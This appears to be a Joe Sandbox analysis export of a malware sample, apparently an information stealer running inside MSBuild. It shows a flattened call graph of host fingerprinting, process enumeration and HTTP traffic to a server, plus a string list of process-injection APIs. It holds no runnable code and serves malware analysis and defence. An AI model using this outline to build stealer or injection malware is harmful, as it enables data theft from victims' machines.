calls 83283->83284 83285 403199 83284->83285 83286 4047e8 3 API calls 83285->83286 83287 4031af 83286->83287 83288 4047e8 3 API calls 83287->83288 83289 4031c5 83288->83289 83290 4047e8 3 API calls 83289->83290 83291 4031dc 83290->83291 83292 4047e8 3 API calls 83291->83292 83293 4031f2 83292->83293 83294 4047e8 3 API calls 83293->83294 83295 40320c 83294->83295 83296 4047e8 3 API calls 83295->83296 83297 403223 83296->83297 83298 4047e8 3 API calls 83297->83298 83299 40323a 83298->83299 83300 4047e8 3 API calls 83299->83300 83301 403250 83300->83301 83302 4047e8 3 API calls 83301->83302 83303 403267 83302->83303 83304 4047e8 3 API calls 83303->83304 83305 40327e 83304->83305 83306 4047e8 3 API calls 83305->83306 83307 403295 83306->83307 83308 4047e8 3 API calls 83307->83308 83309 4032ab 83308->83309 83310 4047e8 3 API calls 83309->83310 83311 4032c2 83310->83311 83312 4047e8 3 API calls 83311->83312 83313 4032d9 83312->83313 83314 4047e8 3 API calls 83313->83314 83315 4032f0 83314->83315 83316 4047e8 3 API calls 83315->83316 83317 403306 83316->83317 83318 4047e8 3 API calls 83317->83318 83319 40331c 83318->83319 83320 4047e8 3 API calls 83319->83320 83321 403333 83320->83321 83322 4047e8 3 API calls 83321->83322 83323 403349 83322->83323 83324 4047e8 3 API calls 83323->83324 83325 40335d 83324->83325 83326 4047e8 3 API calls 83325->83326 83327 403374 83326->83327 83328 4047e8 3 API calls 83327->83328 83329 40338a 83328->83329 83330 4047e8 3 API calls 83329->83330 83331 4033a1 83330->83331 83332 4047e8 3 API calls 83331->83332 83333 4033b8 83332->83333 83334 4047e8 3 API calls 83333->83334 83335 4033cf 83334->83335 83336 4047e8 3 API calls 83335->83336 83337 4033e6 83336->83337 83338 4047e8 3 API calls 83337->83338 83339 4033fd 83338->83339 83340 4047e8 3 API calls 83339->83340 83341 403414 83340->83341 83342 4047e8 3 API calls 83341->83342 83343 40342e 83342->83343 83344 4047e8 3 API calls 83343->83344 83345 403445 83344->83345 83346 4047e8 3 API calls 
83345->83346 83347 40345c 83346->83347 83348 4047e8 3 API calls 83347->83348 83349 403473 83348->83349 83350 4047e8 3 API calls 83349->83350 83351 40348a 83350->83351 83352 4047e8 3 API calls 83351->83352 83353 4034a1 83352->83353 83354 4047e8 3 API calls 83353->83354 83355 4034b8 83354->83355 83356 4047e8 3 API calls 83355->83356 83357 4034cf 83356->83357 83358 4047e8 3 API calls 83357->83358 83359 4034e9 83358->83359 83360 4047e8 3 API calls 83359->83360 83361 403500 83360->83361 83362 4047e8 3 API calls 83361->83362 83363 403517 83362->83363 83364 4047e8 3 API calls 83363->83364 83365 40352e 83364->83365 83366 4047e8 3 API calls 83365->83366 83367 403545 83366->83367 83368 4047e8 3 API calls 83367->83368 83369 40355c 83368->83369 83370 4047e8 3 API calls 83369->83370 83371 403573 83370->83371 83372 4047e8 3 API calls 83371->83372 83373 40358a 83372->83373 83374 4047e8 3 API calls 83373->83374 83375 4035a4 83374->83375 83376 4047e8 3 API calls 83375->83376 83377 4035bb 83376->83377 83378 4047e8 3 API calls 83377->83378 83379 4035d2 83378->83379 83380 4047e8 3 API calls 83379->83380 83381 4035e9 83380->83381 83382 4047e8 3 API calls 83381->83382 83383 403600 83382->83383 83384 4047e8 3 API calls 83383->83384 83385 403617 83384->83385 83386 4047e8 3 API calls 83385->83386 83387 40362d 83386->83387 83388 4047e8 3 API calls 83387->83388 83389 403643 83388->83389 83390 4047e8 3 API calls 83389->83390 83391 40365d 83390->83391 83392 4047e8 3 API calls 83391->83392 83393 403674 83392->83393 83394 4047e8 3 API calls 83393->83394 83395 40368b 83394->83395 83396 4047e8 3 API calls 83395->83396 83397 4036a1 83396->83397 83398 4047e8 3 API calls 83397->83398 83399 4036b8 83398->83399 83400 4047e8 3 API calls 83399->83400 83401 4036cf 83400->83401 83402 4047e8 3 API calls 83401->83402 83403 4036e3 83402->83403 83404 4047e8 3 API calls 83403->83404 83405 4036f9 83404->83405 83406 4047e8 3 API calls 83405->83406 83407 403713 83406->83407 83408 4047e8 3 API calls 83407->83408 
83409 40372a 83408->83409 83410 4047e8 3 API calls 83409->83410 83411 403741 83410->83411 83412 4047e8 3 API calls 83411->83412 83413 403758 83412->83413 83414 4047e8 3 API calls 83413->83414 83415 40376f 83414->83415 83416 4047e8 3 API calls 83415->83416 83417 403786 83416->83417 83418 4047e8 3 API calls 83417->83418 83419 40379a 83418->83419 83420 4047e8 3 API calls 83419->83420 83421 4037b1 83420->83421 83422 4047e8 3 API calls 83421->83422 83423 4037cb 83422->83423 83424 4047e8 3 API calls 83423->83424 83425 4037e2 83424->83425 83426 4047e8 3 API calls 83425->83426 83427 4037f6 83426->83427 83428 4047e8 3 API calls 83427->83428 83429 40380a 83428->83429 83430 4047e8 3 API calls 83429->83430 83431 403821 83430->83431 83432 4047e8 3 API calls 83431->83432 83433 403838 83432->83433 83434 4047e8 3 API calls 83433->83434 83435 40384f 83434->83435 83436 4047e8 3 API calls 83435->83436 83437 403866 83436->83437 83438 4047e8 3 API calls 83437->83438 83439 403880 83438->83439 83440 4047e8 3 API calls 83439->83440 83441 403897 83440->83441 83442 4047e8 3 API calls 83441->83442 83443 4038ae 83442->83443 83444 4047e8 3 API calls 83443->83444 83445 4038c5 83444->83445 83446 4047e8 3 API calls 83445->83446 83447 4038db 83446->83447 83448 4047e8 3 API calls 83447->83448 83449 4038f2 83448->83449 83450 4047e8 3 API calls 83449->83450 83451 403906 83450->83451 83452 4047e8 3 API calls 83451->83452 83453 40391d 83452->83453 83454 4047e8 3 API calls 83453->83454 83455 403937 83454->83455 83456 4047e8 3 API calls 83455->83456 83457 40394e 83456->83457 83458 4047e8 3 API calls 83457->83458 83459 403965 83458->83459 83460 4047e8 3 API calls 83459->83460 83461 40397c 83460->83461 83462 4047e8 3 API calls 83461->83462 83463 403993 83462->83463 83464 4047e8 3 API calls 83463->83464 83465 4039aa 83464->83465 83466 4047e8 3 API calls 83465->83466 83467 4039c1 83466->83467 83468 4047e8 3 API calls 83467->83468 83469 4039d8 83468->83469 83470 4047e8 3 API calls 83469->83470 83471 4039f2 
83470->83471 83472 4047e8 3 API calls 83471->83472 83473 403a09 83472->83473 83474 4047e8 3 API calls 83473->83474 83475 403a20 83474->83475 83476 4047e8 3 API calls 83475->83476 83477 403a37 83476->83477 83478 4047e8 3 API calls 83477->83478 83479 403a4e 83478->83479 83480 4047e8 3 API calls 83479->83480 83481 403a65 83480->83481 83482 4047e8 3 API calls 83481->83482 83483 403a7c 83482->83483 83484 4047e8 3 API calls 83483->83484 83485 403a90 83484->83485 83486 4047e8 3 API calls 83485->83486 83487 403aaa 83486->83487 83488 4047e8 3 API calls 83487->83488 83489 403ac1 83488->83489 83490 4047e8 3 API calls 83489->83490 83491 403ad7 83490->83491 83492 4047e8 3 API calls 83491->83492 83493 403aee 83492->83493 83494 4047e8 3 API calls 83493->83494 83495 403b05 83494->83495 83496 4047e8 3 API calls 83495->83496 83497 403b1c 83496->83497 83498 4047e8 3 API calls 83497->83498 83499 403b33 83498->83499 83500 4047e8 3 API calls 83499->83500 83501 403b4a 83500->83501 83502 4047e8 3 API calls 83501->83502 83503 403b61 83502->83503 83504 4047e8 3 API calls 83503->83504 83505 403b75 83504->83505 83506 4047e8 3 API calls 83505->83506 83507 403b8c 83506->83507 83508 4047e8 3 API calls 83507->83508 83509 403ba3 83508->83509 83510 4047e8 3 API calls 83509->83510 83511 403bba 83510->83511 83512 4047e8 3 API calls 83511->83512 83513 403bd1 83512->83513 83514 4047e8 3 API calls 83513->83514 83515 403be8 83514->83515 83516 4047e8 3 API calls 83515->83516 83517 403bff 83516->83517 83518 4047e8 3 API calls 83517->83518 83519 403c19 83518->83519 83520 4047e8 3 API calls 83519->83520 83521 403c30 83520->83521 83522 4047e8 3 API calls 83521->83522 83523 403c47 83522->83523 83524 4047e8 3 API calls 83523->83524 83525 403c5e 83524->83525 83526 4047e8 3 API calls 83525->83526 83527 403c75 83526->83527 83528 4047e8 3 API calls 83527->83528 83529 403c8c 83528->83529 83530 4047e8 3 API calls 83529->83530 83531 403ca3 83530->83531 83532 4047e8 3 API calls 83531->83532 83533 403cb7 83532->83533 
83534 4047e8 3 API calls 83533->83534 83535 403cd1 83534->83535 83536 4047e8 3 API calls 83535->83536 83537 403ce8 83536->83537 83538 4047e8 3 API calls 83537->83538 83539 403cff 83538->83539 83540 4047e8 3 API calls 83539->83540 83541 403d16 83540->83541 83542 4047e8 3 API calls 83541->83542 83543 403d2c 83542->83543 83544 4047e8 3 API calls 83543->83544 83545 403d43 83544->83545 83546 4047e8 3 API calls 83545->83546 83547 403d57 83546->83547 83548 4047e8 3 API calls 83547->83548 83549 403d6e 83548->83549 83550 4047e8 3 API calls 83549->83550 83551 403d85 83550->83551 83552 4047e8 3 API calls 83551->83552 83553 403d9c 83552->83553 83554 4047e8 3 API calls 83553->83554 83555 403db3 83554->83555 83556 4047e8 3 API calls 83555->83556 83557 403dca 83556->83557 83558 4047e8 3 API calls 83557->83558 83559 403de1 83558->83559 83560 4047e8 3 API calls 83559->83560 83561 403df8 83560->83561 83562 4047e8 3 API calls 83561->83562 83563 403e0f 83562->83563 83564 4047e8 3 API calls 83563->83564 83565 403e26 83564->83565 83566 4047e8 3 API calls 83565->83566 83567 403e40 83566->83567 83568 4047e8 3 API calls 83567->83568 83569 403e57 83568->83569 83570 4047e8 3 API calls 83569->83570 83571 403e6e 83570->83571 83572 4047e8 3 API calls 83571->83572 83573 403e84 83572->83573 83574 4047e8 3 API calls 83573->83574 83575 403e9b 83574->83575 83576 4047e8 3 API calls 83575->83576 83577 403eb2 83576->83577 83578 4047e8 3 API calls 83577->83578 83579 403ec9 83578->83579 83580 4047e8 3 API calls 83579->83580 83581 403ee0 83580->83581 83582 4047e8 3 API calls 83581->83582 83583 403efa 83582->83583 83584 4047e8 3 API calls 83583->83584 83585 403f10 83584->83585 83586 4047e8 3 API calls 83585->83586 83587 403f27 83586->83587 83588 4047e8 3 API calls 83587->83588 83589 403f3e 83588->83589 83590 4047e8 3 API calls 83589->83590 83591 403f55 83590->83591 83592 4047e8 3 API calls 83591->83592 83593 403f6c 83592->83593 83594 4047e8 3 API calls 83593->83594 83595 403f80 83594->83595 83596 4047e8 3 
API calls 83595->83596 83597 403f97 83596->83597 83598 4047e8 3 API calls 83597->83598 83599 403fb1 83598->83599 83600 4047e8 3 API calls 83599->83600 83601 403fc7 83600->83601 83602 4047e8 3 API calls 83601->83602 83603 403fde 83602->83603 83604 4047e8 3 API calls 83603->83604 83605 403ff2 83604->83605 83606 4047e8 3 API calls 83605->83606 83607 404009 83606->83607 83608 4047e8 3 API calls 83607->83608 83609 404020 83608->83609 83610 4047e8 3 API calls 83609->83610 83611 404037 83610->83611 83612 4047e8 3 API calls 83611->83612 83613 40404e 83612->83613 83614 4047e8 3 API calls 83613->83614 83615 404067 83614->83615 83616 4047e8 3 API calls 83615->83616 83617 40407e 83616->83617 83618 4047e8 3 API calls 83617->83618 83619 404094 83618->83619 83620 4047e8 3 API calls 83619->83620 83621 4040a8 83620->83621 83622 4047e8 3 API calls 83621->83622 83623 4040bf 83622->83623 83624 4047e8 3 API calls 83623->83624 83625 4040d6 83624->83625 83626 4047e8 3 API calls 83625->83626 83627 4040ed 83626->83627 83628 4047e8 3 API calls 83627->83628 83629 404104 83628->83629 83630 4047e8 3 API calls 83629->83630 83631 40411e 83630->83631 83632 4047e8 3 API calls 83631->83632 83633 404135 83632->83633 83634 4047e8 3 API calls 83633->83634 83635 40414c 83634->83635 83636 4047e8 3 API calls 83635->83636 83637 404163 83636->83637 83638 4047e8 3 API calls 83637->83638 83639 404179 83638->83639 83640 4047e8 3 API calls 83639->83640 83641 40418d 83640->83641 83642 4047e8 3 API calls 83641->83642 83643 4041a1 83642->83643 83644 4047e8 3 API calls 83643->83644 83645 4041b8 83644->83645 83646 4047e8 3 API calls 83645->83646 83647 4041d2 83646->83647 83648 4047e8 3 API calls 83647->83648 83649 4041e8 83648->83649 83650 4047e8 3 API calls 83649->83650 83651 4041ff 83650->83651 83652 4047e8 3 API calls 83651->83652 83653 404216 83652->83653 83654 4047e8 3 API calls 83653->83654 83655 40422d 83654->83655 83656 4047e8 3 API calls 83655->83656 83657 404244 83656->83657 83658 4047e8 3 API calls 
83657->83658 83659 404258 83658->83659 83660 4047e8 3 API calls 83659->83660 83661 40426e 83660->83661 83662 4047e8 3 API calls 83661->83662 83663 404288 83662->83663 83664 4047e8 3 API calls 83663->83664 83665 40429f 83664->83665 83666 4047e8 3 API calls 83665->83666 83667 4042b6 83666->83667 83668 4047e8 3 API calls 83667->83668 83669 4042cc 83668->83669 83670 4047e8 3 API calls 83669->83670 83671 4042e3 83670->83671 83672 4047e8 3 API calls 83671->83672 83673 4042fa 83672->83673 83674 4047e8 3 API calls 83673->83674 83675 404311 83674->83675 83676 4047e8 3 API calls 83675->83676 83677 404325 83676->83677 83678 4047e8 3 API calls 83677->83678 83679 40433c 83678->83679 83680 4047e8 3 API calls 83679->83680 83681 404353 83680->83681 83682 4047e8 3 API calls 83681->83682 83683 40436a 83682->83683 83684 4047e8 3 API calls 83683->83684 83685 404381 83684->83685 83686 4047e8 3 API calls 83685->83686 83687 404395 83686->83687 83688 4047e8 3 API calls 83687->83688 83689 4043ac 83688->83689 83690 4047e8 3 API calls 83689->83690 83691 4043c3 83690->83691 83692 4047e8 3 API calls 83691->83692 83693 4043da 83692->83693 83694 4047e8 3 API calls 83693->83694 83695 4043f1 83694->83695 83696 4047e8 3 API calls 83695->83696 83697 404408 83696->83697 83698 4047e8 3 API calls 83697->83698 83699 40441c 83698->83699 83700 4047e8 3 API calls 83699->83700 83701 404433 83700->83701 83702 4047e8 3 API calls 83701->83702 83703 40444a 83702->83703 83704 4047e8 3 API calls 83703->83704 83705 40445e 83704->83705 83706 4047e8 3 API calls 83705->83706 83707 404472 83706->83707 83708 4047e8 3 API calls 83707->83708 83709 404486 83708->83709 83710 4047e8 3 API calls 83709->83710 83711 4044a0 83710->83711 83712 4047e8 3 API calls 83711->83712 83713 4044b7 83712->83713 83714 4047e8 3 API calls 83713->83714 83715 4044cd 83714->83715 83716 4047e8 3 API calls 83715->83716 83717 4044e4 83716->83717 83718 4047e8 3 API calls 83717->83718 83719 4044fa 83718->83719 83720 4047e8 3 API calls 83719->83720 
83721 404511 83720->83721 83722 4047e8 3 API calls 83721->83722 83723 404528 83722->83723 83724 4047e8 3 API calls 83723->83724 83725 40453e 83724->83725 83726 4047e8 3 API calls 83725->83726 83727 404558 83726->83727 83728 4047e8 3 API calls 83727->83728 83729 40456f 83728->83729 83730 4047e8 3 API calls 83729->83730 83731 404586 83730->83731 83732 4047e8 3 API calls 83731->83732 83733 40459d 83732->83733 83734 4047e8 3 API calls 83733->83734 83735 4045b4 83734->83735 83736 4047e8 3 API calls 83735->83736 83737 4045cb 83736->83737 83738 4047e8 3 API calls 83737->83738 83739 4045e2 83738->83739 83740 4047e8 3 API calls 83739->83740 83741 4045f9 83740->83741 83742 4047e8 3 API calls 83741->83742 83743 404612 83742->83743 83744 4047e8 3 API calls 83743->83744 83745 404629 83744->83745 83746 4047e8 3 API calls 83745->83746 83747 404642 83746->83747 83748 4047e8 3 API calls 83747->83748 83749 404656 83748->83749 83750 4047e8 3 API calls 83749->83750 83751 40466d 83750->83751 83752 4047e8 3 API calls 83751->83752 83753 404684 83752->83753 83754 4047e8 3 API calls 83753->83754 83755 40469b 83754->83755 83756 4047e8 3 API calls 83755->83756 83757 4046b2 83756->83757 83758 4047e8 3 API calls 83757->83758 83759 4046cc 83758->83759 83760 4047e8 3 API calls 83759->83760 83761 4046e3 83760->83761 83762 4047e8 3 API calls 83761->83762 83763 4046f9 83762->83763 83764 4047e8 3 API calls 83763->83764 83765 404710 83764->83765 83766 4047e8 3 API calls 83765->83766 83767 404727 83766->83767 83768 4047e8 3 API calls 83767->83768 83769 40473d 83768->83769 83770 4047e8 3 API calls 83769->83770 83771 404754 83770->83771 83772 4047e8 3 API calls 83771->83772 83773 404768 83772->83773 83774 4047e8 3 API calls 83773->83774 83775 404781 83774->83775 83776 4047e8 3 API calls 83775->83776 83777 404797 83776->83777 83778 4047e8 3 API calls 83777->83778 83779 4047ae 83778->83779 83780 4047e8 3 API calls 83779->83780 83781 4047c5 83780->83781 83782 4047e8 3 API calls 83781->83782 83783 4047dc 
83782->83783 83783->82800 85102 42f109 83784->85102 83786 41258e CreateToolhelp32Snapshot Process32First 83787 4125c2 Process32Next 83786->83787 83788 4125ef CloseHandle 83786->83788 83787->83788 83790 4125d4 StrCmpCA 83787->83790 85103 42f165 83788->85103 83790->83787 83792 4125e6 83790->83792 83792->83787 83794 4104e7 lstrcpyA 83793->83794 83795 411c67 83794->83795 83796 4104e7 lstrcpyA 83795->83796 83797 411c75 GetSystemTime 83796->83797 83798 411c91 83797->83798 83799 41d016 _CountryEnumProc@4 5 API calls 83798->83799 83800 411cc8 83799->83800 83800->82806 83803 4105e1 83801->83803 83802 410605 83802->82822 83803->83802 83804 4105f3 lstrcpyA lstrcatA 83803->83804 83804->83802 83806 410519 lstrcpyA 83805->83806 83807 401d07 83806->83807 83808 410519 lstrcpyA 83807->83808 83809 401d12 83808->83809 83810 410519 lstrcpyA 83809->83810 83811 401d1d 83810->83811 83812 410519 lstrcpyA 83811->83812 83813 401d34 83812->83813 83814 4169b6 83813->83814 83815 410549 2 API calls 83814->83815 83816 4169ec 83815->83816 83817 410549 2 API calls 83816->83817 83818 4169f9 83817->83818 83819 410549 2 API calls 83818->83819 83820 416a06 83819->83820 83821 4104e7 lstrcpyA 83820->83821 83822 416a13 83821->83822 83823 4104e7 lstrcpyA 83822->83823 83824 416a20 83823->83824 83825 4104e7 lstrcpyA 83824->83825 83826 416a2d 83825->83826 83827 4104e7 lstrcpyA 83826->83827 83828 416a3a 83827->83828 83829 4104e7 lstrcpyA 83828->83829 83830 416a47 83829->83830 83831 4104e7 lstrcpyA 83830->83831 83871 416a54 83831->83871 83834 401cfd lstrcpyA 83834->83871 83835 416a98 StrCmpCA 83836 416af1 StrCmpCA 83835->83836 83835->83871 83837 416cd4 83836->83837 83836->83871 83840 41058d lstrcpyA 83837->83840 83841 416cdf 83840->83841 83843 4104e7 lstrcpyA 83841->83843 83844 416cec 83843->83844 83845 41058d lstrcpyA 83844->83845 83846 416c2c 83845->83846 83850 4104e7 lstrcpyA 83846->83850 83847 41683e 28 API calls 83847->83871 83848 4168c6 33 API calls 83848->83871 83849 41058d lstrcpyA 83849->83871 83851 
416d0b 83850->83851 83853 41058d lstrcpyA 83851->83853 83852 416b51 StrCmpCA 83854 416baa StrCmpCA 83852->83854 83852->83871 83855 416d15 83853->83855 83857 416bc0 StrCmpCA 83854->83857 83858 416ca3 83854->83858 85115 416da2 83855->85115 83860 416c72 83857->83860 83861 416bd6 StrCmpCA 83857->83861 83859 41058d lstrcpyA 83858->83859 83867 416cae 83859->83867 83865 41058d lstrcpyA 83860->83865 83862 416be8 StrCmpCA 83861->83862 83863 416c3e 83861->83863 83869 416c0a 83862->83869 83870 416bfa Sleep 83862->83870 83873 41058d lstrcpyA 83863->83873 83864 410519 lstrcpyA 83864->83871 83872 416c7d 83865->83872 83868 4104e7 lstrcpyA 83867->83868 83874 416cbb 83868->83874 83875 41058d lstrcpyA 83869->83875 83870->83871 83871->83834 83871->83835 83871->83836 83871->83847 83871->83848 83871->83849 83871->83852 83871->83854 83871->83864 85106 4029f8 83871->85106 85109 402a09 83871->85109 85112 402a1a 83871->85112 85122 402a2b lstrcpyA 83871->85122 85123 402a3c lstrcpyA 83871->85123 85124 402a4d lstrcpyA 83871->85124 83876 4104e7 lstrcpyA 83872->83876 83877 416c49 83873->83877 83878 41058d lstrcpyA 83874->83878 83879 416c15 83875->83879 83880 416c8a 83876->83880 83881 4104e7 lstrcpyA 83877->83881 83878->83846 83882 4104e7 lstrcpyA 83879->83882 83883 41058d lstrcpyA 83880->83883 83884 416c56 83881->83884 83886 416c22 83882->83886 83883->83846 83885 41058d lstrcpyA 83884->83885 83885->83846 83887 41058d lstrcpyA 83886->83887 83887->83846 83888 416d28 83888->82833 83890 41058d lstrcpyA 83889->83890 83891 418257 83890->83891 83892 41058d lstrcpyA 83891->83892 83893 418262 83892->83893 83894 41058d lstrcpyA 83893->83894 83895 41826d 83894->83895 83895->82838 83897 410529 83896->83897 83898 41053e 83897->83898 83899 410536 lstrcpyA 83897->83899 83898->82850 83899->83898 83901 4109e6 GetVolumeInformationA 83900->83901 83902 4109df 83900->83902 83903 410a4d 83901->83903 83902->83901 83903->83903 83904 410a62 GetProcessHeap HeapAlloc 83903->83904 83905 410a7d 83904->83905 83906 410a8c 
wsprintfA lstrcatA 83904->83906 83907 4104e7 lstrcpyA 83905->83907 85125 411684 GetCurrentHwProfileA 83906->85125 83909 410a85 83907->83909 83912 41d016 _CountryEnumProc@4 5 API calls 83909->83912 83910 410ac7 lstrlenA 85141 4123d5 lstrcpyA malloc strncpy 83910->85141 83914 410b2e 83912->83914 83913 410aea lstrcatA 83915 410b01 83913->83915 83914->82876 83916 4104e7 lstrcpyA 83915->83916 83917 410b18 83916->83917 83917->83909 83919 410519 lstrcpyA 83918->83919 83920 404b59 83919->83920 85145 404ab6 83920->85145 83922 404b65 83923 4104e7 lstrcpyA 83922->83923 83924 404b81 83923->83924 83925 4104e7 lstrcpyA 83924->83925 83926 404b91 83925->83926 83927 4104e7 lstrcpyA 83926->83927 83928 404ba1 83927->83928 83929 4104e7 lstrcpyA 83928->83929 83930 404bb1 83929->83930 83931 4104e7 lstrcpyA 83930->83931 83932 404bc1 InternetOpenA StrCmpCA 83931->83932 83933 404bf5 83932->83933 83934 405194 InternetCloseHandle 83933->83934 83935 411c4a 7 API calls 83933->83935 83945 4051e1 83934->83945 83936 404c15 83935->83936 83937 4105c7 2 API calls 83936->83937 83938 404c28 83937->83938 83939 41058d lstrcpyA 83938->83939 83940 404c33 83939->83940 83941 410609 3 API calls 83940->83941 83942 404c5f 83941->83942 83943 41058d lstrcpyA 83942->83943 83944 404c6a 83943->83944 83947 410609 3 API calls 83944->83947 83946 41d016 _CountryEnumProc@4 5 API calls 83945->83946 83949 405235 83946->83949 83948 404c8b 83947->83948 83950 41058d lstrcpyA 83948->83950 84051 4139c2 StrCmpCA 83949->84051 83951 404c96 83950->83951 83952 4105c7 2 API calls 83951->83952 83953 404cb8 83952->83953 83954 41058d lstrcpyA 83953->83954 83955 404cc3 83954->83955 83956 410609 3 API calls 83955->83956 83957 404ce4 83956->83957 83958 41058d lstrcpyA 83957->83958 83959 404cef 83958->83959 83960 410609 3 API calls 83959->83960 83961 404d10 83960->83961 83962 41058d lstrcpyA 83961->83962 83963 404d1b 83962->83963 83964 410609 3 API calls 83963->83964 83965 404d3d 83964->83965 83966 4105c7 2 API calls 83965->83966 83967 
404d48 83966->83967 83968 41058d lstrcpyA 83967->83968 83969 404d53 83968->83969 83970 404d69 InternetConnectA 83969->83970 83970->83934 83971 404d97 HttpOpenRequestA 83970->83971 83972 404dd7 83971->83972 83973 405188 InternetCloseHandle 83971->83973 83974 404dfb 83972->83974 83975 404ddf InternetSetOptionA 83972->83975 83973->83934 83976 410609 3 API calls 83974->83976 83975->83974 83977 404e11 83976->83977 83978 41058d lstrcpyA 83977->83978 83979 404e1c 83978->83979 83980 4105c7 2 API calls 83979->83980 83981 404e3e 83980->83981 83982 41058d lstrcpyA 83981->83982 83983 404e49 83982->83983 83984 410609 3 API calls 83983->83984 83985 404e6a 83984->83985 83986 41058d lstrcpyA 83985->83986 83987 404e75 83986->83987 83988 410609 3 API calls 83987->83988 83989 404e97 83988->83989 83990 41058d lstrcpyA 83989->83990 83991 404ea2 83990->83991 83992 410609 3 API calls 83991->83992 83993 404ec3 83992->83993 83994 41058d lstrcpyA 83993->83994 83995 404ece 83994->83995 83996 410609 3 API calls 83995->83996 83997 404eef 83996->83997 83998 41058d lstrcpyA 83997->83998 83999 404efa 83998->83999 84000 4105c7 2 API calls 83999->84000 84001 404f19 84000->84001 84002 41058d lstrcpyA 84001->84002 84003 404f24 84002->84003 84004 410609 3 API calls 84003->84004 84005 404f45 84004->84005 84006 41058d lstrcpyA 84005->84006 84007 404f50 84006->84007 84008 410609 3 API calls 84007->84008 84009 404f71 84008->84009 84010 41058d lstrcpyA 84009->84010 84011 404f7c 84010->84011 84012 4105c7 2 API calls 84011->84012 84013 404f9e 84012->84013 84014 41058d lstrcpyA 84013->84014 84015 404fa9 84014->84015 84016 410609 3 API calls 84015->84016 84017 404fca 84016->84017 84018 41058d lstrcpyA 84017->84018 84019 404fd5 84018->84019 84020 410609 3 API calls 84019->84020 84021 404ff7 84020->84021 84022 41058d lstrcpyA 84021->84022 84023 405002 84022->84023 84024 410609 3 API calls 84023->84024 84025 405023 84024->84025 84026 41058d lstrcpyA 84025->84026 84027 40502e 84026->84027 84028 410609 3 API calls 
84027->84028 84029 40504f 84028->84029 84030 41058d lstrcpyA 84029->84030 84031 40505a 84030->84031 84032 4105c7 2 API calls 84031->84032 84033 405079 84032->84033 84034 41058d lstrcpyA 84033->84034 84035 405084 84034->84035 84036 4104e7 lstrcpyA 84035->84036 84037 40509f 84036->84037 84038 4105c7 2 API calls 84037->84038 84039 4050b6 84038->84039 84040 4105c7 2 API calls 84039->84040 84041 4050c7 84040->84041 84042 41058d lstrcpyA 84041->84042 84043 4050d2 84042->84043 84044 4050e8 lstrlenA lstrlenA HttpSendRequestA 84043->84044 84045 40515c InternetReadFile 84044->84045 84046 405176 InternetCloseHandle 84045->84046 84049 40511c 84045->84049 84047 402920 84046->84047 84047->83973 84048 410609 3 API calls 84048->84049 84049->84045 84049->84046 84049->84048 84050 41058d lstrcpyA 84049->84050 84050->84049 84052 4139e1 ExitProcess 84051->84052 84053 4139e8 strtok_s 84051->84053 84054 413a04 84053->84054 84055 413b48 84053->84055 84056 413b2a strtok_s 84054->84056 84057 413a21 StrCmpCA 84054->84057 84058 413a75 StrCmpCA 84054->84058 84059 413ab4 StrCmpCA 84054->84059 84060 413af4 StrCmpCA 84054->84060 84061 413b16 StrCmpCA 84054->84061 84062 413a59 StrCmpCA 84054->84062 84063 413ac9 StrCmpCA 84054->84063 84064 413a3d StrCmpCA 84054->84064 84065 413a9f StrCmpCA 84054->84065 84066 413ade StrCmpCA 84054->84066 84067 410549 2 API calls 84054->84067 84055->82885 84056->84054 84056->84055 84057->84054 84057->84056 84058->84054 84058->84056 84059->84054 84059->84056 84060->84056 84061->84056 84062->84054 84062->84056 84063->84054 84063->84056 84064->84054 84064->84056 84065->84054 84065->84056 84066->84056 84067->84054 84069 410519 lstrcpyA 84068->84069 84070 405f64 84069->84070 84071 404ab6 5 API calls 84070->84071 84072 405f70 84071->84072 84073 4104e7 lstrcpyA 84072->84073 84074 405f8c 84073->84074 84075 4104e7 lstrcpyA 84074->84075 84076 405f9c 84075->84076 84077 4104e7 lstrcpyA 84076->84077 84078 405fac 84077->84078 84079 4104e7 lstrcpyA 84078->84079 84080 405fbc 
84079->84080 84081 4104e7 lstrcpyA 84080->84081 84082 405fcc InternetOpenA StrCmpCA 84081->84082 84083 406000 84082->84083 84084 4066ff InternetCloseHandle 84083->84084 84086 411c4a 7 API calls 84083->84086 85151 408048 CryptStringToBinaryA 84084->85151 84087 406020 84086->84087 84089 4105c7 2 API calls 84087->84089 84090 406033 84089->84090 84093 41058d lstrcpyA 84090->84093 84091 410549 2 API calls 84092 406739 84091->84092 84094 410609 3 API calls 84092->84094 84097 40603e 84093->84097 84095 406750 84094->84095 84096 41058d lstrcpyA 84095->84096 84102 40675b 84096->84102 84098 410609 3 API calls 84097->84098 84099 40606a 84098->84099 84100 41058d lstrcpyA 84099->84100 84101 406075 84100->84101 84104 410609 3 API calls 84101->84104 84103 41d016 _CountryEnumProc@4 5 API calls 84102->84103 84105 4067eb 84103->84105 84106 406096 84104->84106 84235 41343f strtok_s 84105->84235 84107 41058d lstrcpyA 84106->84107 84108 4060a1 84107->84108 84109 4105c7 2 API calls 84108->84109 84110 4060c3 84109->84110 84111 41058d lstrcpyA 84110->84111 84112 4060ce 84111->84112 84113 410609 3 API calls 84112->84113 84114 4060ef 84113->84114 84115 41058d lstrcpyA 84114->84115 84116 4060fa 84115->84116 84117 410609 3 API calls 84116->84117 84118 40611b 84117->84118 84119 41058d lstrcpyA 84118->84119 84120 406126 84119->84120 84121 410609 3 API calls 84120->84121 84122 406148 84121->84122 84123 4105c7 2 API calls 84122->84123 84124 406153 84123->84124 84125 41058d lstrcpyA 84124->84125 84126 40615e 84125->84126 84127 406174 InternetConnectA 84126->84127 84127->84084 84128 4061a2 HttpOpenRequestA 84127->84128 84129 4061e2 84128->84129 84130 4066f3 InternetCloseHandle 84128->84130 84131 406206 84129->84131 84132 4061ea InternetSetOptionA 84129->84132 84130->84084 84133 410609 3 API calls 84131->84133 84132->84131 84134 40621c 84133->84134 84135 41058d lstrcpyA 84134->84135 84136 406227 84135->84136 84137 4105c7 2 API calls 84136->84137 84138 406249 84137->84138 84139 41058d lstrcpyA 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2190030987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: AddressProc$LibraryLoad
• String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
• API String ID: 2238633743-2740034357
